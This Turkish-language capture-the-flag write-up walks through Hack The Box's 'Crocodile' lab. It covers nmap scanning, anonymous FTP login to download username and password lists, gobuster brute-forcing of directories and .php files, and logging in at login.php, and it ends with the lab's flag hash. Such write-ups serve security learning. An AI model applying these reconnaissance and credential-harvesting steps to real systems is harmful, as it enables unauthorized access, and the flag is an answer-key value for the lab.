Adım 0: Başlangıç#

1
mkdir -p HTB/LAB/CROCODILE && cd HTB/LAB/CROCODILE
2
IP=10.129.1.15 && ping -c 2 $IP

Bu komutları anlamıyorsan, ilk raporlara göz at.

• GİT! Başlangıç bölümünü incele -> Meow
• GİT! Başlangıç bölümünü incele -> Fawn

Adım 1: Keşif#

1
nmap -sC -sV $IP

Adım 2: FTP#

vsftpd 3.0.3, anonymous girişine izin verir.

1
ftp $IP

• Name: anonymous
• Password: Enter ile giriş yap.

Aşağıdaki komut dizisini izleyerek, get komutunu kullanarak FTP’den ihtiyacımız olan dosyaları kendi ana bilgisayarımıza transfer ediyoruz.

1
ls
2
get allowed.userlist
3
get allowed.userlist.passwd
4
bye

ve FTP’den çıkıyoruz. bye..

1
ls
2
cat allowed.userlist

Dosyaları yerel olarak açıyoruz — bir kullanıcı adı listesi ve paralel bir parola listesi bulacaksınız (aynı satır sırası kimlik bilgisi çiftlerine karşılık gelir).

Admin veya ayrıcalıklı kullanıcı gibi görünen hesabı belirleyin.

Adım 3: Web#

Bir sonraki adım için nmap çıktısına geri dönmemiz gerekiyor. Soruyu cevaplayalım.

bu du Diğer sorunun cevabını bulmak için gobuster dir --help komutunu kullanıyorum.

-x ile dosya uzantılarını belirtiyoruz. OK!

URL’leri manuel olarak tahmin etmek işsizlik. Bu yüzden dizinleri ve .php dosyalarını brute-force işleminden geçireceğiz..

NOTE

İşletim sistemime ve seclist yapıma bağlı olarak yazmam gereken komut biraz farklı. Gobuster’ı kendi sistemine göre ayarlayabilirsin. Kısacası, seclist/ ile dizin taraması yapıyorum.

1
gobuster dir -u http://$IP/ -w $(find /usr/share/seclists -name "*medium.txt" | head -n 1) -x php

1
gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirb/common.txt -x php # alternative

Ardından http://$IP/login.php adresine giderek bulmacayı çözüyoruz.

1
ls
2
cat allowed.userlist.passwd

Flag#

1
c7110277ac44d78b6a9fff2232434d16

Tamamdır!#